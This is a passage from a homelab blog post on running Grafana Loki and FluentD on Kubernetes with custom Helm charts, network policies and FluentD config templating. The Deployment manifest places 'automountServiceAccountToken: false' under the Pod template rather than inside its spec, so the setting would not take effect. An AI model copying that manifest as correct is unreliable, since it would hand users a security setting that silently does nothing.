</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        - from: 2024-01-01
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          store: boltdb-shipper
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          object_store: s3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          schema: v12
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          index:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            prefix: index_
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            period: 24h
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    compactor:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      working_directory: {{ .Values.lokiPath }}/compactor/
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      shared_store: s3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      retention_enabled: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    limits_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      reject_old_samples: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      max_entries_limit_per_query: 10000
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deletion_mode: &#34;filter-and-delete&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      retention_period: 1y</span>
</span></span></code></pre></div><p>Note that the <code>${ENV_VAR_NAME}</code> syntax is a feature of Loki when reading the
configuration file; it doesn&rsquo;t have anything to do with k8s directly.
I will show the CLI option that needs to be handed to Loki for this later.</p>
<p>I kept this config relatively simple. The <code>common:</code> config defines a couple
of shared components, most importantly the S3 storage. Further, I&rsquo;m also
configuring Redis for caching.</p>
<p>Last, before coming to the Deployment, here&rsquo;s the scratch volume, on my Ceph
SSD pool:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">2Gi</span>
</span></span></code></pre></div><p>This is merely a small workspace for Loki. As long as it gets enough time during
shutdown, it will upload all relevant data to S3.</p>
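<p>Kubernetes gives Pods 30 seconds by default before killing them. If that ever turns
out to be too short for Loki&rsquo;s flush to S3, it can be raised in the Deployment&rsquo;s Pod
template, roughly like this (the value is made up):</p>
<pre tabindex="0"><code>spec:
  template:
    spec:
      terminationGracePeriodSeconds: 120
</code></pre>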
<p>And now, the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>      {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">grafana/loki:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config.expand-env=true&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-config.file={{ .Values.lokiPath }}/conf/loki.yaml&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">envFrom</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">configMapRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.lokiPath }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.lokiPath }}/conf/</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">400Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/ready&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-conf</span>
</span></span></code></pre></div><p>The first config to look at is the <code>Recreate</code> update strategy, which is needed
because I&rsquo;m mounting a PVC. With the default <code>RollingUpdate</code> strategy, the
fresh Pod won&rsquo;t be able to start, because the volume will still be mounted
by the old Pod.</p>
<p>I&rsquo;m also applying an interesting strategy in the Pod&rsquo;s annotations:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/config.yaml&#34;) . | sha256sum }}</span>
</span></span></code></pre></div><p>This takes the ConfigMap I showed before, templates it, and then takes the
SHA-256 hash of the resulting string. Because the annotation is part of the Pod
template, a change in the hash changes the template itself, and the Deployment
rolls out a fresh Pod. This way, the Pod is automatically recreated when the
Loki config changes.</p>
<p>I also mentioned above that a CLI flag needs to be set to have Loki insert
environment variables into the configuration file. This is the <code>-config.expand-env=true</code>
flag.</p>
<p>Finally, I&rsquo;d like to point out the <code>securityContext.fsGroup</code> setting. I did not
have this setting in the beginning, which had the consequence that Loki threw
<code>Permission denied</code> errors when trying to create a couple of directories during
startup. In my experience, this setting is always needed when mounting PVCs, at
least Ceph PVCs.</p>
<p>I also had to set up a Service and an Ingress, as my Nomad Grafana instance will
need to access Loki until I&rsquo;ve moved it over to k8s as well. I only
show the manifests here for completeness&rsquo; sake:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ClusterIP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;logs.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`logs.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">loki-http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>I&rsquo;ve also configured a CiliumNetworkPolicy for the Namespace, which looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;loki&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span></code></pre></div><p>This already contains the rule for the FluentD access I&rsquo;ll set up later.</p>
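<p>With the Service, Ingress and network policy in place, a quick sanity check is to
hit Loki&rsquo;s readiness endpoint, the same one the liveness probe uses, from a Pod
inside the <code>loki</code> Namespace (anything else is blocked by the policy above). The
hostname is an assumption based on the Service and namespace names shown here:</p>
<pre tabindex="0"><code>curl http://loki.loki.svc.cluster.local:3100/ready
</code></pre>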
<h1 id="fluentd-setup">FluentD setup</h1>
<p>Next step down the logging stack is my <a href="https://www.fluentd.org/">FluentD</a>
instance. I&rsquo;m using it in the role of a log aggregator. All logs produced in
my Homelab ultimately end up here. I&rsquo;ve kept all per-host log shippers as dumb
as possible and do all log massaging and aggregation in FluentD. It has served
me well ever since the days when I briefly used Influx&rsquo;s <a href="https://www.influxdata.com/time-series-platform/telegraf/">Telegraf</a>.
It is highly efficient, serving all the syslogs and application
logs from my entire setup with 105 MB of memory and 1.7% of the CPU. The only
slightly weird thing is the configuration language, which has a decidedly XML
character, showing the time it was initially implemented. &#x1f609;</p>
<p>I&rsquo;m running FluentD as a single instance, made available to my entire Homelab
via a LoadBalancer type Service. It has to listen on a number of ports:
for syslog in both standard formats (<a href="https://datatracker.ietf.org/doc/html/rfc3164">RFC3164</a>
and <a href="https://datatracker.ietf.org/doc/html/rfc5424">RFC5424</a>), over both TCP and UDP,
as well as for forwarded logs from the Nomad and k8s clusters.</p>
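<p>For orientation, a LoadBalancer Service exposing a few of those ports looks roughly
like this. The port numbers are taken from the chart values shown below; everything
else is illustrative and my actual manifest differs:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Service
metadata:
  name: fluentd
spec:
  type: LoadBalancer
  selector:
    app: fluentd
  ports:
    - name: syslog-tcp
      port: 5144
      protocol: TCP
    - name: syslog-udp
      port: 5144
      protocol: UDP
    - name: forward-k8s
      port: 24230
      protocol: TCP
</code></pre>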
<p>I&rsquo;m building my own Helm chart here again, mostly because the image used
in the official chart does not support all the plugins I need, so I&rsquo;m also
building my own image. I&rsquo;m currently using the following plugins in my configs
(a rough sketch of how such an image can install them follows the list):</p>
<ul>
<li><a href="https://rubygems.org/gems/fluent-plugin-grafana-loki/">fluent-plugin-grafana-loki</a></li>
<li><a href="https://github.com/repeatedly/fluent-plugin-record-modifier">fluent-plugin-record-modifier</a></li>
<li><a href="https://github.com/repeatedly/fluent-plugin-multi-format-parser">fluent-plugin-multi-format-parser</a></li>
<li><a href="https://github.com/fluent/fluent-plugin-rewrite-tag-filter">fluent-plugin-rewrite-tag-filter</a></li>
<li><a href="https://github.com/tagomoris/fluent-plugin-route">fluent-plugin-route</a></li>
<li><a href="https://github.com/k63207/fluent-plugin-http-healthcheck">fluent-plugin-http-healthcheck</a></li>
<li><a href="https://github.com/fluent-plugins-nursery/fluent-plugin-kv-parser">fluent-plugin-kv-parser</a></li>
</ul>
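<p>As mentioned above, here&rsquo;s a rough sketch of how such an image can pull in these
plugins, for example as a <code>RUN</code> step in a Dockerfile based on the upstream FluentD
image. This is an illustration, not my actual build:</p>
<pre tabindex="0"><code>fluent-gem install \
    fluent-plugin-grafana-loki \
    fluent-plugin-record-modifier \
    fluent-plugin-multi-format-parser \
    fluent-plugin-rewrite-tag-filter \
    fluent-plugin-route \
    fluent-plugin-http-healthcheck \
    fluent-plugin-kv-parser
</code></pre>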
<p>I will start with the Kubernetes setup here and go into details about the
actual FluentD config later.</p>
<p>One nice thing I was able to do in my Helm chart is the way the config files
are delivered. They are all put into a single ConfigMap, automatically, without
me having to adapt the Kubernetes manifests when adding a new config file.</p>
<p>In my chart root directory, I&rsquo;ve got a subdirectory <code>configs/</code>, where I store
all of the FluentD config files. Then I&rsquo;ve got the following ConfigMap:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd-conf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>{{ <span style="color:#ae81ff">(tpl (.Files.Glob &#34;configs/*&#34;).AsConfig .) | indent 2 }}</span>
</span></span></code></pre></div><p>The magic is all in the last line. First, the <code>Files.Glob</code> function gets a number
of <code>Files</code> objects from the <code>configs/*</code> path. The <code>AsConfig</code> method then turns
each of those objects into the proper format to work in a ConfigMap&rsquo;s <code>data:</code>
key. This happens by formatting it like this, for a file at <code>configs/redis-k8s.conf</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">redis-k8s.conf</span>: <span style="color:#ae81ff">|                                                                                                  </span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># Log configuration for Redis on k8s                                                                                                                                                                                                    </span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">&lt;filter services.redis.redis&gt;                                                                                    </span>
</span></span><span style="display:flex;"><span>    @<span style="color:#ae81ff">type parser                                                                                                   </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">key_name log                                                                                                   </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">reserve_data true                                                                                              </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">remove_key_name_field true                                                                                     </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">&lt;parse&gt;                                                                                                        </span>
</span></span><span style="display:flex;"><span>      @<span style="color:#ae81ff">type regexp                                                                                                 </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">expression /^[0-9]+:[XCSM] (?&lt;logtime&gt;[0-9]{2} [A-Za-z]{3} [0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3}) (?&lt;level&gt;[\.\-\*\#]) [^$]+$/                                                                                               </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">time_key logtime                                                                                             </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">time_type string                                                                                             </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">utc true                                                                                                     </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">time_format %d %b %Y %H:%M:%S.%N                                                                             </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">&lt;/parse&gt;                                                                                                       </span>
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">&lt;/filter&gt;                      </span>
</span></span></code></pre></div><p>Finally, <code>tpl</code> is called on the result, as I&rsquo;m referencing Helm chart values in
some of the config files. The only thing I&rsquo;m a bit worried about is the maximum
size of a ConfigMap, which is capped at 1 MiB of data and may be hit at some
point with this approach.</p>
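<p>A quick way to keep an eye on that is to render just the ConfigMap template and
check how many bytes it comes out to; the template file name is an assumption
based on my chart layout:</p>
<pre tabindex="0"><code>helm template . --show-only templates/config.yaml | wc -c
</code></pre>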
<p>Speaking of the Helm chart values, here they are:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">syslog</span>: <span style="color:#ae81ff">5144</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">syslogTls</span>: <span style="color:#ae81ff">6514</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logShippers</span>: <span style="color:#ae81ff">24225</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">netconsole</span>: <span style="color:#ae81ff">6666</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">health</span>: <span style="color:#ae81ff">8888</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">k8sLogs</span>: <span style="color:#ae81ff">24230</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">mountDir</span>: <span style="color:#ae81ff">/fluentd/log</span>
</span></span></code></pre></div><p>Again relatively simple, as I can configure most things by just changing the
templates directly. The <code>netconsole</code> here is a port for the kernel&rsquo;s netconsole,
which I&rsquo;m using for my netbooting hosts to see the early boot process without
having to connect a screen to them. The post about that has been sitting in my repo as a draft since
I started the k8s migration plan back in December. &#x1f605;
The <code>logShippers</code> port is used by the Fluentbit instances deployed on Nomad,
while the k8s logs are sent to the <code>k8sLogs</code> port.</p>
<p>There&rsquo;s again a scratch volume involved, which is used for on-disk buffers
before logs are sent over to Loki, so that there&rsquo;s no loss when the FluentD
container is suddenly killed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
